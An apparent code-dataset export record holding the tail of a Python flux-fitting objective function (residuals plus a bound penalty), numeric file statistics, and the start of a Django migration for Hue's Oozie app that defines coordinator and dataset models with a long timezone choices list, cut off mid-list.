    Returns:
        float: RSS + penalty score (when the flux vector lies outside of the
        lower and upper boundaries).

    See Also:
        fit_r_mdv_scipy
    """
    Rm_initial = kwargs['Rm_initial']
    stoichiometric_num = kwargs['stoichiometric_num']
    reaction_num = kwargs['reaction_num']
    matrixinv = kwargs['matrixinv']
    experiments = kwargs['experiments']
    mdv_exp = numpy.array(kwargs['mdv_exp'])
    mdv_use = kwargs['mdv_use']
    covinv = kwargs['covinv']
    lb = kwargs['lb']
    ub = kwargs['ub']
    calmdv = kwargs['calmdv']
    diffmdv = kwargs['diffmdv']
    callbacklevel = kwargs['callbacklevel']
    # Reconstruct the full flux vector from the independent fluxes.
    Rm = numpy.array(list(Rm_initial))
    Rm[stoichiometric_num: reaction_num] = list(x)
    tmp_r = numpy.dot(matrixinv, Rm)
    # Boundary penalty: 100000 per unit of protrusion beyond lb/ub.
    g = numpy.hstack((numpy.array(lb) - tmp_r, tmp_r - numpy.array(ub)))
    penalty = 0.0
    for violation in g:
        if violation > 0:
            penalty = penalty + violation * 100000
    # Determination of MDV
    mdv_original = list(tmp_r)
    for experiment in sorted(experiments.keys()):
        target_emu_list = experiments[experiment]['target_emu_list']
        mdv_carbon_sources = experiments[experiment]['mdv_carbon_sources']
        if experiments[experiment]['mode'] == "ST":
            mdv_original_temp, mdv_hash = calmdv(list(tmp_r), target_emu_list, mdv_carbon_sources)
        elif experiments[experiment]['mode'] == "INST":
            y0temp = experiments[experiment]['y0']
            timepoints = experiments[experiment]['timepoint']
            mdv_original_temp, mdv_hash = diffmdv(list(tmp_r), [], timepoints, target_emu_list, mdv_carbon_sources, y0temp)
        mdv_original.extend(mdv_original_temp)
    mdv = numpy.array([y for i, y in enumerate(mdv_original) if mdv_use[i] != 0])
    res = mdv_exp - mdv
    f = numpy.dot(res, numpy.dot(covinv, res))
    # NOTE(review): this only inspects the mode of the LAST experiment in
    # sorted order -- confirm whether the RSS print was meant to be unconditional.
    if experiments[experiment]['mode'] == "INST":
        if callbacklevel >= 4:
            print("RSS:", f)
    return f + penalty
| 33.16
| 201
| 0.616104
| 3,979
| 33,160
| 4.958784
| 0.087459
| 0.007906
| 0.015407
| 0.00892
| 0.813948
| 0.778369
| 0.763773
| 0.739902
| 0.729309
| 0.723633
| 0
| 0.008275
| 0.263872
| 33,160
| 999
| 202
| 33.193193
| 0.8
| 0.05579
| 0
| 0.81289
| 0
| 0
| 0.126225
| 0.012482
| 0
| 0
| 0
| 0.001001
| 0
| 0
| null | null | 0.006237
| 0.012474
| null | null | 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a6b94405c5085fab7f877decc237d7397b6741b
| 87,842
|
py
|
Python
|
apps/oozie/src/oozie/migrations/0001_initial.py
|
kokosing/hue
|
2307f5379a35aae9be871e836432e6f45138b3d9
|
[
"Apache-2.0"
] | 3
|
2018-01-29T14:16:02.000Z
|
2019-02-05T21:33:05.000Z
|
apps/oozie/src/oozie/migrations/0001_initial.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 4
|
2021-03-11T04:02:00.000Z
|
2022-03-27T08:31:56.000Z
|
apps/oozie/src/oozie/migrations/0001_initial.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2
|
2019-12-05T17:24:36.000Z
|
2021-11-22T21:21:32.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-06-06 18:55
from __future__ import unicode_literals
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BundledCoordinator',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('parameters', models.TextField(default=b'[{"name":"oozie.use.system.libpath","value":"true"}]', help_text='Constants used at the submission time (e.g. market=US, oozie.use.system.libpath=true).', verbose_name='Parameters')),
],
),
migrations.CreateModel(
name='DataInput',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the variable of the workflow to automatically fill up.', max_length=40, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name of an input variable in the workflow.')),
],
),
migrations.CreateModel(
name='DataOutput',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the variable of the workflow to automatically filled up.', max_length=40, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name of an output variable in the workflow')),
],
),
migrations.CreateModel(
name='Dataset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the dataset.', max_length=40, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name')),
('description', models.CharField(blank=True, default=b'', help_text='A description of the dataset.', max_length=1024, verbose_name='Description')),
('start', models.DateTimeField(auto_now=True, help_text=' The UTC datetime of the initial instance of the dataset. The initial instance also provides the baseline datetime to compute instances of the dataset using multiples of the frequency.', verbose_name='Start')),
('frequency_number', models.SmallIntegerField(choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], default=1, help_text='The number of units of the rate at which data is periodically created.', verbose_name='Frequency number')),
('frequency_unit', models.CharField(choices=[(b'minutes', 'Minutes'), (b'hours', 'Hours'), (b'days', 'Days'), (b'months', 'Months')], default=b'days', help_text='The unit of the rate at which data is periodically created.', max_length=20, verbose_name='Frequency unit')),
('uri', models.CharField(default=b'/data/${YEAR}${MONTH}${DAY}', help_text='The URI template that identifies the dataset and can be resolved into concrete URIs to identify a particular dataset instance. The URI consist of constants (e.g. ${YEAR}/${MONTH}) and configuration properties (e.g. /home/${USER}/projects/${PROJECT})', max_length=1024, verbose_name='URI')),
('timezone', models.CharField(choices=[(b'Africa/Abidjan', b'Africa/Abidjan'), (b'Africa/Accra', b'Africa/Accra'), (b'Africa/Addis_Ababa', b'Africa/Addis_Ababa'), (b'Africa/Algiers', b'Africa/Algiers'), (b'Africa/Asmara', b'Africa/Asmara'), (b'Africa/Asmera', b'Africa/Asmera'), (b'Africa/Bamako', b'Africa/Bamako'), (b'Africa/Bangui', b'Africa/Bangui'), (b'Africa/Banjul', b'Africa/Banjul'), (b'Africa/Bissau', b'Africa/Bissau'), (b'Africa/Blantyre', b'Africa/Blantyre'), (b'Africa/Brazzaville', b'Africa/Brazzaville'), (b'Africa/Bujumbura', b'Africa/Bujumbura'), (b'Africa/Cairo', b'Africa/Cairo'), (b'Africa/Casablanca', b'Africa/Casablanca'), (b'Africa/Ceuta', b'Africa/Ceuta'), (b'Africa/Conakry', b'Africa/Conakry'), (b'Africa/Dakar', b'Africa/Dakar'), (b'Africa/Dar_es_Salaam', b'Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'Africa/Djibouti'), (b'Africa/Douala', b'Africa/Douala'), (b'Africa/El_Aaiun', b'Africa/El_Aaiun'), (b'Africa/Freetown', b'Africa/Freetown'), (b'Africa/Gaborone', b'Africa/Gaborone'), (b'Africa/Harare', b'Africa/Harare'), (b'Africa/Johannesburg', b'Africa/Johannesburg'), (b'Africa/Juba', b'Africa/Juba'), (b'Africa/Kampala', b'Africa/Kampala'), (b'Africa/Khartoum', b'Africa/Khartoum'), (b'Africa/Kigali', b'Africa/Kigali'), (b'Africa/Kinshasa', b'Africa/Kinshasa'), (b'Africa/Lagos', b'Africa/Lagos'), (b'Africa/Libreville', b'Africa/Libreville'), (b'Africa/Lome', b'Africa/Lome'), (b'Africa/Luanda', b'Africa/Luanda'), (b'Africa/Lubumbashi', b'Africa/Lubumbashi'), (b'Africa/Lusaka', b'Africa/Lusaka'), (b'Africa/Malabo', b'Africa/Malabo'), (b'Africa/Maputo', b'Africa/Maputo'), (b'Africa/Maseru', b'Africa/Maseru'), (b'Africa/Mbabane', b'Africa/Mbabane'), (b'Africa/Mogadishu', b'Africa/Mogadishu'), (b'Africa/Monrovia', b'Africa/Monrovia'), (b'Africa/Nairobi', b'Africa/Nairobi'), (b'Africa/Ndjamena', b'Africa/Ndjamena'), (b'Africa/Niamey', b'Africa/Niamey'), (b'Africa/Nouakchott', b'Africa/Nouakchott'), (b'Africa/Ouagadougou', b'Africa/Ouagadougou'), 
(b'Africa/Porto-Novo', b'Africa/Porto-Novo'), (b'Africa/Sao_Tome', b'Africa/Sao_Tome'), (b'Africa/Timbuktu', b'Africa/Timbuktu'), (b'Africa/Tripoli', b'Africa/Tripoli'), (b'Africa/Tunis', b'Africa/Tunis'), (b'Africa/Windhoek', b'Africa/Windhoek'), (b'America/Adak', b'America/Adak'), (b'America/Anchorage', b'America/Anchorage'), (b'America/Anguilla', b'America/Anguilla'), (b'America/Antigua', b'America/Antigua'), (b'America/Araguaina', b'America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'America/Argentina/Catamarca'), (b'America/Argentina/ComodRivadavia', b'America/Argentina/ComodRivadavia'), (b'America/Argentina/Cordoba', b'America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'America/Argentina/Ushuaia'), (b'America/Aruba', b'America/Aruba'), (b'America/Asuncion', b'America/Asuncion'), (b'America/Atikokan', b'America/Atikokan'), (b'America/Atka', b'America/Atka'), (b'America/Bahia', b'America/Bahia'), (b'America/Bahia_Banderas', b'America/Bahia_Banderas'), (b'America/Barbados', b'America/Barbados'), (b'America/Belem', b'America/Belem'), (b'America/Belize', b'America/Belize'), (b'America/Blanc-Sablon', b'America/Blanc-Sablon'), (b'America/Boa_Vista', b'America/Boa_Vista'), (b'America/Bogota', b'America/Bogota'), (b'America/Boise', b'America/Boise'), (b'America/Buenos_Aires', b'America/Buenos_Aires'), (b'America/Cambridge_Bay', b'America/Cambridge_Bay'), (b'America/Campo_Grande', 
b'America/Campo_Grande'), (b'America/Cancun', b'America/Cancun'), (b'America/Caracas', b'America/Caracas'), (b'America/Catamarca', b'America/Catamarca'), (b'America/Cayenne', b'America/Cayenne'), (b'America/Cayman', b'America/Cayman'), (b'America/Chicago', b'America/Chicago'), (b'America/Chihuahua', b'America/Chihuahua'), (b'America/Coral_Harbour', b'America/Coral_Harbour'), (b'America/Cordoba', b'America/Cordoba'), (b'America/Costa_Rica', b'America/Costa_Rica'), (b'America/Creston', b'America/Creston'), (b'America/Cuiaba', b'America/Cuiaba'), (b'America/Curacao', b'America/Curacao'), (b'America/Danmarkshavn', b'America/Danmarkshavn'), (b'America/Dawson', b'America/Dawson'), (b'America/Dawson_Creek', b'America/Dawson_Creek'), (b'America/Denver', b'America/Denver'), (b'America/Detroit', b'America/Detroit'), (b'America/Dominica', b'America/Dominica'), (b'America/Edmonton', b'America/Edmonton'), (b'America/Eirunepe', b'America/Eirunepe'), (b'America/El_Salvador', b'America/El_Salvador'), (b'America/Ensenada', b'America/Ensenada'), (b'America/Fort_Wayne', b'America/Fort_Wayne'), (b'America/Fortaleza', b'America/Fortaleza'), (b'America/Glace_Bay', b'America/Glace_Bay'), (b'America/Godthab', b'America/Godthab'), (b'America/Goose_Bay', b'America/Goose_Bay'), (b'America/Grand_Turk', b'America/Grand_Turk'), (b'America/Grenada', b'America/Grenada'), (b'America/Guadeloupe', b'America/Guadeloupe'), (b'America/Guatemala', b'America/Guatemala'), (b'America/Guayaquil', b'America/Guayaquil'), (b'America/Guyana', b'America/Guyana'), (b'America/Halifax', b'America/Halifax'), (b'America/Havana', b'America/Havana'), (b'America/Hermosillo', b'America/Hermosillo'), (b'America/Indiana/Indianapolis', b'America/Indiana/Indianapolis'), (b'America/Indiana/Knox', b'America/Indiana/Knox'), (b'America/Indiana/Marengo', b'America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'America/Indiana/Petersburg'), (b'America/Indiana/Tell_City', b'America/Indiana/Tell_City'), 
(b'America/Indiana/Vevay', b'America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'America/Indiana/Winamac'), (b'America/Indianapolis', b'America/Indianapolis'), (b'America/Inuvik', b'America/Inuvik'), (b'America/Iqaluit', b'America/Iqaluit'), (b'America/Jamaica', b'America/Jamaica'), (b'America/Jujuy', b'America/Jujuy'), (b'America/Juneau', b'America/Juneau'), (b'America/Kentucky/Louisville', b'America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'America/Kentucky/Monticello'), (b'America/Knox_IN', b'America/Knox_IN'), (b'America/Kralendijk', b'America/Kralendijk'), (b'America/La_Paz', b'America/La_Paz'), (b'America/Lima', b'America/Lima'), (b'America/Los_Angeles', b'America/Los_Angeles'), (b'America/Louisville', b'America/Louisville'), (b'America/Lower_Princes', b'America/Lower_Princes'), (b'America/Maceio', b'America/Maceio'), (b'America/Managua', b'America/Managua'), (b'America/Manaus', b'America/Manaus'), (b'America/Marigot', b'America/Marigot'), (b'America/Martinique', b'America/Martinique'), (b'America/Matamoros', b'America/Matamoros'), (b'America/Mazatlan', b'America/Mazatlan'), (b'America/Mendoza', b'America/Mendoza'), (b'America/Menominee', b'America/Menominee'), (b'America/Merida', b'America/Merida'), (b'America/Metlakatla', b'America/Metlakatla'), (b'America/Mexico_City', b'America/Mexico_City'), (b'America/Miquelon', b'America/Miquelon'), (b'America/Moncton', b'America/Moncton'), (b'America/Monterrey', b'America/Monterrey'), (b'America/Montevideo', b'America/Montevideo'), (b'America/Montreal', b'America/Montreal'), (b'America/Montserrat', b'America/Montserrat'), (b'America/Nassau', b'America/Nassau'), (b'America/New_York', b'America/New_York'), (b'America/Nipigon', b'America/Nipigon'), (b'America/Nome', b'America/Nome'), (b'America/Noronha', b'America/Noronha'), (b'America/North_Dakota/Beulah', b'America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', 
b'America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'America/North_Dakota/New_Salem'), (b'America/Ojinaga', b'America/Ojinaga'), (b'America/Panama', b'America/Panama'), (b'America/Pangnirtung', b'America/Pangnirtung'), (b'America/Paramaribo', b'America/Paramaribo'), (b'America/Phoenix', b'America/Phoenix'), (b'America/Port-au-Prince', b'America/Port-au-Prince'), (b'America/Port_of_Spain', b'America/Port_of_Spain'), (b'America/Porto_Acre', b'America/Porto_Acre'), (b'America/Porto_Velho', b'America/Porto_Velho'), (b'America/Puerto_Rico', b'America/Puerto_Rico'), (b'America/Rainy_River', b'America/Rainy_River'), (b'America/Rankin_Inlet', b'America/Rankin_Inlet'), (b'America/Recife', b'America/Recife'), (b'America/Regina', b'America/Regina'), (b'America/Resolute', b'America/Resolute'), (b'America/Rio_Branco', b'America/Rio_Branco'), (b'America/Rosario', b'America/Rosario'), (b'America/Santa_Isabel', b'America/Santa_Isabel'), (b'America/Santarem', b'America/Santarem'), (b'America/Santiago', b'America/Santiago'), (b'America/Santo_Domingo', b'America/Santo_Domingo'), (b'America/Sao_Paulo', b'America/Sao_Paulo'), (b'America/Scoresbysund', b'America/Scoresbysund'), (b'America/Shiprock', b'America/Shiprock'), (b'America/Sitka', b'America/Sitka'), (b'America/St_Barthelemy', b'America/St_Barthelemy'), (b'America/St_Johns', b'America/St_Johns'), (b'America/St_Kitts', b'America/St_Kitts'), (b'America/St_Lucia', b'America/St_Lucia'), (b'America/St_Thomas', b'America/St_Thomas'), (b'America/St_Vincent', b'America/St_Vincent'), (b'America/Swift_Current', b'America/Swift_Current'), (b'America/Tegucigalpa', b'America/Tegucigalpa'), (b'America/Thule', b'America/Thule'), (b'America/Thunder_Bay', b'America/Thunder_Bay'), (b'America/Tijuana', b'America/Tijuana'), (b'America/Toronto', b'America/Toronto'), (b'America/Tortola', b'America/Tortola'), (b'America/Vancouver', b'America/Vancouver'), (b'America/Virgin', b'America/Virgin'), (b'America/Whitehorse', 
b'America/Whitehorse'), (b'America/Winnipeg', b'America/Winnipeg'), (b'America/Yakutat', b'America/Yakutat'), (b'America/Yellowknife', b'America/Yellowknife'), (b'Antarctica/Casey', b'Antarctica/Casey'), (b'Antarctica/Davis', b'Antarctica/Davis'), (b'Antarctica/DumontDUrville', b'Antarctica/DumontDUrville'), (b'Antarctica/Macquarie', b'Antarctica/Macquarie'), (b'Antarctica/Mawson', b'Antarctica/Mawson'), (b'Antarctica/McMurdo', b'Antarctica/McMurdo'), (b'Antarctica/Palmer', b'Antarctica/Palmer'), (b'Antarctica/Rothera', b'Antarctica/Rothera'), (b'Antarctica/South_Pole', b'Antarctica/South_Pole'), (b'Antarctica/Syowa', b'Antarctica/Syowa'), (b'Antarctica/Vostok', b'Antarctica/Vostok'), (b'Arctic/Longyearbyen', b'Arctic/Longyearbyen'), (b'Asia/Aden', b'Asia/Aden'), (b'Asia/Almaty', b'Asia/Almaty'), (b'Asia/Amman', b'Asia/Amman'), (b'Asia/Anadyr', b'Asia/Anadyr'), (b'Asia/Aqtau', b'Asia/Aqtau'), (b'Asia/Aqtobe', b'Asia/Aqtobe'), (b'Asia/Ashgabat', b'Asia/Ashgabat'), (b'Asia/Ashkhabad', b'Asia/Ashkhabad'), (b'Asia/Baghdad', b'Asia/Baghdad'), (b'Asia/Bahrain', b'Asia/Bahrain'), (b'Asia/Baku', b'Asia/Baku'), (b'Asia/Bangkok', b'Asia/Bangkok'), (b'Asia/Beijing', b'Asia/Beijing'), (b'Asia/Beirut', b'Asia/Beirut'), (b'Asia/Bishkek', b'Asia/Bishkek'), (b'Asia/Brunei', b'Asia/Brunei'), (b'Asia/Calcutta', b'Asia/Calcutta'), (b'Asia/Choibalsan', b'Asia/Choibalsan'), (b'Asia/Chongqing', b'Asia/Chongqing'), (b'Asia/Chungking', b'Asia/Chungking'), (b'Asia/Colombo', b'Asia/Colombo'), (b'Asia/Dacca', b'Asia/Dacca'), (b'Asia/Damascus', b'Asia/Damascus'), (b'Asia/Dhaka', b'Asia/Dhaka'), (b'Asia/Dili', b'Asia/Dili'), (b'Asia/Dubai', b'Asia/Dubai'), (b'Asia/Dushanbe', b'Asia/Dushanbe'), (b'Asia/Gaza', b'Asia/Gaza'), (b'Asia/Harbin', b'Asia/Harbin'), (b'Asia/Hebron', b'Asia/Hebron'), (b'Asia/Ho_Chi_Minh', b'Asia/Ho_Chi_Minh'), (b'Asia/Hong_Kong', b'Asia/Hong_Kong'), (b'Asia/Hovd', b'Asia/Hovd'), (b'Asia/Irkutsk', b'Asia/Irkutsk'), (b'Asia/Istanbul', b'Asia/Istanbul'), (b'Asia/Jakarta', 
b'Asia/Jakarta'), (b'Asia/Jayapura', b'Asia/Jayapura'), (b'Asia/Jerusalem', b'Asia/Jerusalem'), (b'Asia/Kabul', b'Asia/Kabul'), (b'Asia/Kamchatka', b'Asia/Kamchatka'), (b'Asia/Karachi', b'Asia/Karachi'), (b'Asia/Kashgar', b'Asia/Kashgar'), (b'Asia/Kathmandu', b'Asia/Kathmandu'), (b'Asia/Katmandu', b'Asia/Katmandu'), (b'Asia/Kolkata', b'Asia/Kolkata'), (b'Asia/Krasnoyarsk', b'Asia/Krasnoyarsk'), (b'Asia/Kuala_Lumpur', b'Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'Asia/Kuching'), (b'Asia/Kuwait', b'Asia/Kuwait'), (b'Asia/Macao', b'Asia/Macao'), (b'Asia/Macau', b'Asia/Macau'), (b'Asia/Magadan', b'Asia/Magadan'), (b'Asia/Makassar', b'Asia/Makassar'), (b'Asia/Manila', b'Asia/Manila'), (b'Asia/Muscat', b'Asia/Muscat'), (b'Asia/Nicosia', b'Asia/Nicosia'), (b'Asia/Novokuznetsk', b'Asia/Novokuznetsk'), (b'Asia/Novosibirsk', b'Asia/Novosibirsk'), (b'Asia/Omsk', b'Asia/Omsk'), (b'Asia/Oral', b'Asia/Oral'), (b'Asia/Phnom_Penh', b'Asia/Phnom_Penh'), (b'Asia/Pontianak', b'Asia/Pontianak'), (b'Asia/Pyongyang', b'Asia/Pyongyang'), (b'Asia/Qatar', b'Asia/Qatar'), (b'Asia/Qyzylorda', b'Asia/Qyzylorda'), (b'Asia/Rangoon', b'Asia/Rangoon'), (b'Asia/Riyadh', b'Asia/Riyadh'), (b'Asia/Riyadh87', b'Asia/Riyadh87'), (b'Asia/Riyadh88', b'Asia/Riyadh88'), (b'Asia/Riyadh89', b'Asia/Riyadh89'), (b'Asia/Saigon', b'Asia/Saigon'), (b'Asia/Sakhalin', b'Asia/Sakhalin'), (b'Asia/Samarkand', b'Asia/Samarkand'), (b'Asia/Seoul', b'Asia/Seoul'), (b'Asia/Shanghai', b'Asia/Shanghai'), (b'Asia/Singapore', b'Asia/Singapore'), (b'Asia/Taipei', b'Asia/Taipei'), (b'Asia/Tashkent', b'Asia/Tashkent'), (b'Asia/Tbilisi', b'Asia/Tbilisi'), (b'Asia/Tehran', b'Asia/Tehran'), (b'Asia/Tel_Aviv', b'Asia/Tel_Aviv'), (b'Asia/Thimbu', b'Asia/Thimbu'), (b'Asia/Thimphu', b'Asia/Thimphu'), (b'Asia/Tokyo', b'Asia/Tokyo'), (b'Asia/Ujung_Pandang', b'Asia/Ujung_Pandang'), (b'Asia/Ulaanbaatar', b'Asia/Ulaanbaatar'), (b'Asia/Ulan_Bator', b'Asia/Ulan_Bator'), (b'Asia/Urumqi', b'Asia/Urumqi'), (b'Asia/Vientiane', b'Asia/Vientiane'), 
(b'Asia/Vladivostok', b'Asia/Vladivostok'), (b'Asia/Yakutsk', b'Asia/Yakutsk'), (b'Asia/Yekaterinburg', b'Asia/Yekaterinburg'), (b'Asia/Yerevan', b'Asia/Yerevan'), (b'Atlantic/Azores', b'Atlantic/Azores'), (b'Atlantic/Bermuda', b'Atlantic/Bermuda'), (b'Atlantic/Canary', b'Atlantic/Canary'), (b'Atlantic/Cape_Verde', b'Atlantic/Cape_Verde'), (b'Atlantic/Faeroe', b'Atlantic/Faeroe'), (b'Atlantic/Faroe', b'Atlantic/Faroe'), (b'Atlantic/Jan_Mayen', b'Atlantic/Jan_Mayen'), (b'Atlantic/Madeira', b'Atlantic/Madeira'), (b'Atlantic/Reykjavik', b'Atlantic/Reykjavik'), (b'Atlantic/South_Georgia', b'Atlantic/South_Georgia'), (b'Atlantic/St_Helena', b'Atlantic/St_Helena'), (b'Atlantic/Stanley', b'Atlantic/Stanley'), (b'Australia/ACT', b'Australia/ACT'), (b'Australia/Adelaide', b'Australia/Adelaide'), (b'Australia/Brisbane', b'Australia/Brisbane'), (b'Australia/Broken_Hill', b'Australia/Broken_Hill'), (b'Australia/Canberra', b'Australia/Canberra'), (b'Australia/Currie', b'Australia/Currie'), (b'Australia/Darwin', b'Australia/Darwin'), (b'Australia/Eucla', b'Australia/Eucla'), (b'Australia/Hobart', b'Australia/Hobart'), (b'Australia/LHI', b'Australia/LHI'), (b'Australia/Lindeman', b'Australia/Lindeman'), (b'Australia/Lord_Howe', b'Australia/Lord_Howe'), (b'Australia/Melbourne', b'Australia/Melbourne'), (b'Australia/NSW', b'Australia/NSW'), (b'Australia/North', b'Australia/North'), (b'Australia/Perth', b'Australia/Perth'), (b'Australia/Queensland', b'Australia/Queensland'), (b'Australia/South', b'Australia/South'), (b'Australia/Sydney', b'Australia/Sydney'), (b'Australia/Tasmania', b'Australia/Tasmania'), (b'Australia/Victoria', b'Australia/Victoria'), (b'Australia/West', b'Australia/West'), (b'Australia/Yancowinna', b'Australia/Yancowinna'), (b'Brazil/Acre', b'Brazil/Acre'), (b'Brazil/DeNoronha', b'Brazil/DeNoronha'), (b'Brazil/East', b'Brazil/East'), (b'Brazil/West', b'Brazil/West'), (b'CET', b'CET'), (b'CST6CDT', b'CST6CDT'), (b'Canada/Atlantic', b'Canada/Atlantic'), 
(b'Canada/Central', b'Canada/Central'), (b'Canada/East-Saskatchewan', b'Canada/East-Saskatchewan'), (b'Canada/Eastern', b'Canada/Eastern'), (b'Canada/Mountain', b'Canada/Mountain'), (b'Canada/Newfoundland', b'Canada/Newfoundland'), (b'Canada/Pacific', b'Canada/Pacific'), (b'Canada/Saskatchewan', b'Canada/Saskatchewan'), (b'Canada/Yukon', b'Canada/Yukon'), (b'Chile/Continental', b'Chile/Continental'), (b'Chile/EasterIsland', b'Chile/EasterIsland'), (b'Cuba', b'Cuba'), (b'EET', b'EET'), (b'EST', b'EST'), (b'EST5EDT', b'EST5EDT'), (b'Egypt', b'Egypt'), (b'Eire', b'Eire'), (b'Etc/GMT', b'Etc/GMT'), (b'Etc/GMT+0', b'Etc/GMT+0'), (b'Etc/GMT+1', b'Etc/GMT+1'), (b'Etc/GMT+10', b'Etc/GMT+10'), (b'Etc/GMT+11', b'Etc/GMT+11'), (b'Etc/GMT+12', b'Etc/GMT+12'), (b'Etc/GMT+2', b'Etc/GMT+2'), (b'Etc/GMT+3', b'Etc/GMT+3'), (b'Etc/GMT+4', b'Etc/GMT+4'), (b'Etc/GMT+5', b'Etc/GMT+5'), (b'Etc/GMT+6', b'Etc/GMT+6'), (b'Etc/GMT+7', b'Etc/GMT+7'), (b'Etc/GMT+8', b'Etc/GMT+8'), (b'Etc/GMT+9', b'Etc/GMT+9'), (b'Etc/GMT-0', b'Etc/GMT-0'), (b'Etc/GMT-1', b'Etc/GMT-1'), (b'Etc/GMT-10', b'Etc/GMT-10'), (b'Etc/GMT-11', b'Etc/GMT-11'), (b'Etc/GMT-12', b'Etc/GMT-12'), (b'Etc/GMT-13', b'Etc/GMT-13'), (b'Etc/GMT-14', b'Etc/GMT-14'), (b'Etc/GMT-2', b'Etc/GMT-2'), (b'Etc/GMT-3', b'Etc/GMT-3'), (b'Etc/GMT-4', b'Etc/GMT-4'), (b'Etc/GMT-5', b'Etc/GMT-5'), (b'Etc/GMT-6', b'Etc/GMT-6'), (b'Etc/GMT-7', b'Etc/GMT-7'), (b'Etc/GMT-8', b'Etc/GMT-8'), (b'Etc/GMT-9', b'Etc/GMT-9'), (b'Etc/GMT0', b'Etc/GMT0'), (b'Etc/Greenwich', b'Etc/Greenwich'), (b'Etc/UCT', b'Etc/UCT'), (b'Etc/UTC', b'Etc/UTC'), (b'Etc/Universal', b'Etc/Universal'), (b'Etc/Zulu', b'Etc/Zulu'), (b'Europe/Amsterdam', b'Europe/Amsterdam'), (b'Europe/Andorra', b'Europe/Andorra'), (b'Europe/Athens', b'Europe/Athens'), (b'Europe/Belfast', b'Europe/Belfast'), (b'Europe/Belgrade', b'Europe/Belgrade'), (b'Europe/Berlin', b'Europe/Berlin'), (b'Europe/Bratislava', b'Europe/Bratislava'), (b'Europe/Brussels', b'Europe/Brussels'), (b'Europe/Bucharest', 
b'Europe/Bucharest'), (b'Europe/Budapest', b'Europe/Budapest'), (b'Europe/Chisinau', b'Europe/Chisinau'), (b'Europe/Copenhagen', b'Europe/Copenhagen'), (b'Europe/Dublin', b'Europe/Dublin'), (b'Europe/Gibraltar', b'Europe/Gibraltar'), (b'Europe/Guernsey', b'Europe/Guernsey'), (b'Europe/Helsinki', b'Europe/Helsinki'), (b'Europe/Isle_of_Man', b'Europe/Isle_of_Man'), (b'Europe/Istanbul', b'Europe/Istanbul'), (b'Europe/Jersey', b'Europe/Jersey'), (b'Europe/Kaliningrad', b'Europe/Kaliningrad'), (b'Europe/Kiev', b'Europe/Kiev'), (b'Europe/Lisbon', b'Europe/Lisbon'), (b'Europe/Ljubljana', b'Europe/Ljubljana'), (b'Europe/London', b'Europe/London'), (b'Europe/Luxembourg', b'Europe/Luxembourg'), (b'Europe/Madrid', b'Europe/Madrid'), (b'Europe/Malta', b'Europe/Malta'), (b'Europe/Mariehamn', b'Europe/Mariehamn'), (b'Europe/Minsk', b'Europe/Minsk'), (b'Europe/Monaco', b'Europe/Monaco'), (b'Europe/Moscow', b'Europe/Moscow'), (b'Europe/Nicosia', b'Europe/Nicosia'), (b'Europe/Oslo', b'Europe/Oslo'), (b'Europe/Paris', b'Europe/Paris'), 